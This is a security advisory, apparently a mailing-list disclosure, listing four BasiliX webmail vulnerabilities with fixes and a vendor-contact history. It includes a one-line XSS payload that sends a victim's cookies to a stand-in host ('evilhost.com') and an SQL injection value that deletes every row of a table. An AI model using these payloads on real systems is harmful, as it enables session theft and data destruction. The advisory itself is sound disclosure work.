BasiliX multiple vulnerabilities

[Ulf Harnhammar <ulfh () update uu se>]

BasiliX multiple vulnerabilities


PROGRAM: BasiliX
VENDOR: Murat Arslan <arslanm () basilix org> et al.
HOMEPAGE: http://basilix.org/
VULNERABLE VERSIONS: 1.1.0 and all previous versions
LOGIN REQUIRED: yes (some issues), no (some issues)
SEVERITY: high


DESCRIPTION:

"BasiliX is a webmail application based on PHP and IMAP, and powered with the
MySQL database server. It supports simple mail actions, sending/receiving
attachments, an addressbook with group capability, settings utility, multiple
languages, multiple folders and themes."
(direct quote from the program's project page at Freshmeat)

It is published under the terms of the GNU General Public License.


SECURITY HOLES:

1) The attachment capability in Compose Mail can be fooled into treating any
file on the web server as the uploaded file. This means that it is easy to
steal sensitive information on that server (like the /etc/passwd file), and
mail it off to someone.

When uploading files, PHP sets some global variables, one of which gives the
temporary location where the uploaded file was stored. PHP usually also sets
global variables with GET or POST form data. BasiliX doesn't check if the
attachment really was uploaded by the user, or if it just was some POST data
with the same format.

This issue can be fixed by using the is_uploaded_file() function, to see if a
file was in fact uploaded.

2) The program has got some cross-site scripting issues. In mail folders, in
Find Mail and when you read a message, the Subject mail header is shown
without removing any HTML tags. When a message is read, the mail body is also
shown without removing any HTML tags. This means that an attacker can include
JavaScript code in an e-mail message, and that it will be executed in the
user's browser when he or she looks at that message.

This can be used for stealing a user's cookies, to allow the attacker to take
over the user's session, by including JavaScript code like this:

<script>self.location.href="http://evilhost.com/evil?"+escape(document.
cookie)</script>

It can also be used as a form of Denial of Service attack. If there is a
message in your inbox folder that immediately redirects your browser to
Slashdot as soon as you enter that folder, it gets rather hard to read your
e-mail.

This can be fixed by always using the htmlspecialchars() function when
printing variables that shouldn't contain HTML tags.

3) The attached files are saved in /tmp/BasiliX. They are readable by all
users, and it seems like they never get deleted. This means that anyone who
has got shell access to the server, or who can upload web scripts to it, can
read all files any user has ever attached to an e-mail.

4) BasiliX has got some SQL Injection holes. If you have an SQL statement
where data from outside is not placed in apostrophes or quotes, like this:

DELETE FROM table WHERE id=$id

you can wipe all rows in the table by giving $id the value "id". This will
execute the statement:

DELETE FROM table WHERE id=id

The way to fix this is to put all outside data in apostrophes or quotes, like
this:

DELETE FROM table WHERE id='$id'

or to use PHP's is_numeric() function.


COMMUNICATION WITH VENDOR:

The vendor was contacted on the 19th of May. He replied, and we discussed
these issues in a couple of mails. I haven't heard from him since the 26th of
May. No fixed version has been released yet.

To be fair to Murat, he had some excuse for not working on the program. On the
other hand, I think that the users of BasiliX want a secure mail program and
not just excuses.


// Ulf Harnhammar
ulfh () update uu se